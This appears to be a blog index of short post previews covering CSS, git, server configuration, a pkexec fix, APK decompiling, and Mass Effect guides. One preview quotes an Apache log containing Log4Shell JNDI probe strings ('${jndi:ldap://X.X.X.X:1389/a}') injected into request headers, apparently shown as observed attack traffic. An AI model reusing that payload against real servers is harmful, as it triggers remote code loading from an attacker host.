Flight Radar -------------- Tab PING Period INCREASE Comma DECREASE FLIGHT TARGETING -------------- 9 HAIL TARGET 1-3 TARGET LOCK ALT 1-3 TARGET PIN 0 REMOVE PINNED ALT + T UNLOCK ALT + L UNLOCK AHEAD G GIMBAL ON OFF FLIGHT EXTRAS ----------------- N LANDING GEAR O DOCKING CAM B QUANTUM TRAVEL P WEAPON POWER I THRUSTER POWER O SHIELD POWER V SCANNI...
The most actual systems have an update for this. If not you can close this vulnerability by executing: chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File. More info here: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 Image for the Thumbnail: ...
[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a} [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request header coul...
Here is an example how to replace for example the string "https://test.de/testthis/" with "https://newlink.de/testthis/". The code is: UPDATE tablenamehere SET columnname = REPLACE(columnname , 'test.de', 'newlink.de'); ...
1. Rename your .apk to .zip 2. Unzip 3. locate classes.dex 4. Download Dex2Jar (Windows/Linux) 5. Use cmd/shell to navigate to dex2jar Folder. 6. Use command "dex2jar <source>" with source as your classes.dex file. 7. Now you have a new .jar file. This is the output of the .dex file. 8. You can use JDGUI to decompile...
Only to store. I am not working on this enigma Cr4P ...
Here are the copies of the unknown book that i found. Page after page... ...
The "Sommerton Man" is an unknown person who died on the 30. Nov 1948 in Australia. Here you can get the Autopsy Report. The cause of death is unknown, but its rumored that he died from intoxication of an unknown poison.A Cipher has been found under mysterious cirmunstances which seems like a digitless code. Surely this code needs...
Content Security Header (HSTS) Apache: Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" Nginx: add_header Strict-Transport-Security 'max-age=31536000; includeSubDomains; preload'; Content Security Policy (CSP) Apache: Header always set Content-Security-Policy "default-src...
Attention! This script has been written 2010 and could be outdated. Start.SH - Start Firewall #!/bin/sh #Start Firewall #Copyright by Xeno # echo echo Firewall Starter echo echo Die Firewall wird gestartet und der Port 22 SSH echo für die Fernkontrolle freigegeben. echo echo Wollen sie die Firewall nun aktivieren? y/n read RESPONSE echo if...
<!doctype html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1"...
Code for an Animated Border on a Box, only with CSS and HTML used! <style> .container{ padding-top: 20px; padding-bottom: 20px;} .box{ position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 100px; height: 100px; background: #111845a6; box-sizing: border-box; overflow: hidden; box-shadow: 0 20px 50px rgb(23, ...
This is the code for an .htaccess file which does: -> Redirect all www requests to non-www requests -> Always force SSL RewriteCond %{HTTPS} !=on RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] RewriteCond %{HTTP_HOST} ^www\\.(.*)$ [NC] RewriteRule ^(.*)$ https://%1/$1 [R=301,L] ...
<style> .pie { /* Basic layout */ display: inline-block; width: 10em; height: 10em; border-radius: 50%; /* A little styling */ border: .15em solid #fff; box-shadow: 0 .075em .2em .05em rgba(0,0,0,.25); /* fixes a minor clipping issue in Chrome */ background-origin: border-box; } .pie { background-image: conic-gradient( #d44 calc(3.6de...
Flicker Text Example <style>@keyframes textflicker { from {text-shadow: 1px 0 0 #C1C1C1, -2px 0 0 #000000} to {text-shadow: 2px 0.5px 2px #C1C1C1, -1px -0.5px 2px #000000;}} #statered2 { padding: 1em; color: #CcCcCc; font-size: 1em; line-height: 1; text-shadow: 0.06rem 0 0.06rem #2c2c2c, -0.125rem 0 0.06rem #2c2c2c; letter-spacing: 0....
Here is a sample command for cmd to set a Port Forwarding on a Windows Client Example: netsh interface portproxy add v4tov4 listenaddress=192.168.178.54 listenport=1254 connectaddress=192.168.178.55 connectport=80 ...
Create a new Repository from Command Line echo "# asd" >> README.md git init git add README.md git commit -m "first commit" git branch -M main git remote add origin https://github.com/bugfishtm/asd.git git push -u origin main Push an existing repository from the command line git remote add origin ht...
How to use git to clone a remote repository? Open the CommandLine Navigate to the Folder You want to get the repository cloned to Execute Git Command: "git clone https://yourgitlaburl.url/group/repository.git" Now the actual repository files should be in your Folder. A successfull output looks like this: Cloning into 'exam...
Find a String inside Files grep -rnw '/path/to/somewhere/' -e 'pattern' Find File in Folder Structure find ./ -name card.php Display Linux System Informations uname Display Kernel Releases Informations uname -r Display Systems uptime and load average uptime Show the systems hostname hostname Display IP-Adress of Syst...
This is an easy postfix configuration to backup all emails going to specified domains until the master server is online again. Postfix Configuration [replace yourhostname with your hostname]: smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination myhostname = yourhostname alias_maps = hash:/etc/aliases alia...
This unix Command will make a file non-writable. Make non-Writable chattr +i file Make writable again chattr -i file See Status: lsattr file ...
This adds a rule to forwars port 1022 to port 22 (SSH) an another internal IP. iptables -t nat -A PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.168.137.100:22 This removes the previous commands changes: iptables -t nat -D PREROUTING -i vmbr0 -p tcp --dport 1022 -j DNAT --to 192.168.137.100:22 ...
This script is for a proxmox host to set up 2 bridges. 1 provides static ip 4 and 6 to vservers 1 provides NAT routed connection Start of /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). source /etc/network/interfaces.d/* # The loopback...
If you encounter z-Index Problems on safari you can try to put that code into your z-indexed element: -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); ...
Put this into an element to prevent padding / borders from changing the width of an element. -webkit-box-sizing: border-box; /* Chrome */ -moz-box-sizing: border-box; /* Firefox */ box-sizing: border-box; /* Opera/IE */ ...
You can download my full Paragon Savegame here! Details: -> All Missions and DLC Mission achieved -> Cerberus has taken over Collectors Ship -> All Crew Members and Kaidan survived -> Council Survived -> ME2 has been played with ME1 full Paragon Savegame and all Missions done This savegame is the perfect ME3 start...
Objective is to locate a protean sphere and report it to the citadel. Location: Gei Hinnom / Sheol / Hades Nexus Unfortunately there are no Images available. ...
Objective is to clear the mine from transformed workers. Location: Aequitas / Fortis / Minos Wasteland Unfortunately we have no Images available related to this Mission. ...
Objective is to disable a Geth Weather device, which changes the planets atmossphere. Location: Canalus / Dirada / Pylos Nebula ...
Objective is to repair the magnetic shield, which protects the planet from interstellar radiation. Location: Sinmara / Solveig / Caleston Rift ...
Objective is to destroy a vorcha weapons base and flee from the location. Location: Zada Ban / Xe Cha / The Shrike Abysall ...
Objective is to secure mainframe data from an ancient ship, which is in danger to fall from a cliff. Location: Zanethu / Ploitari / Hourglass Nebula ...
Objective is to disable the Rescue Beacon and fight the malfunctioning LOKI Mechs. Location: Neith / Amun / Eagle Nebula ...
Objective is to reactivate a mesh and use him to break all walls which are blocking the way to retrieve an ancient artifact. Location: Taitus / Talava / Caleston rift ...
Illegal Mercenary Activity on this planet to take care of. Location: Joab / Enoch / Rosetta Nebula ...
Objective is to destroy a mercenary base and decrypt a hostile message. Location: Helyme / Zelene / Crescent Nebula ...
Here is an example function to get the full html output code of an URL provided to the function into a string. You can get the data by using a string variable which gets the output: string variable = gethtmlcontent("https://thisisapage"); public string gethtmlcontent(String URL) { HttpWebRequest request; HttpWebResponse response; ...
Here is an example to allow software to run only once on a machine. If the user tries to start the application again, there will ne a notification box and the program will exit. [file] program.cs in visual studio using System; using System.Threading; using System.Windows.Forms; namespace myapplicationnamespace { static class Program { /// <s...
You can download a full paragon savegame here. -> 100 % Paragon / 0 % Renegade -> All objectives reached which are possible -> Kaidan Alenko survived Virmire -> Anderson got into Council -> Female Shepard ...
Here you can find a map with all objects and minerals on the planet Xawin in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Tuntau in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Trebin in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Solcrum in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Sharjila in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Rayingri in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Presrop in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Ontarom in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Nonuel in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Nodacrux in Mass Effect 1 ...
Here you can find a map with all objects and minerals on the planet Nepmos in Mass Effect 1 ...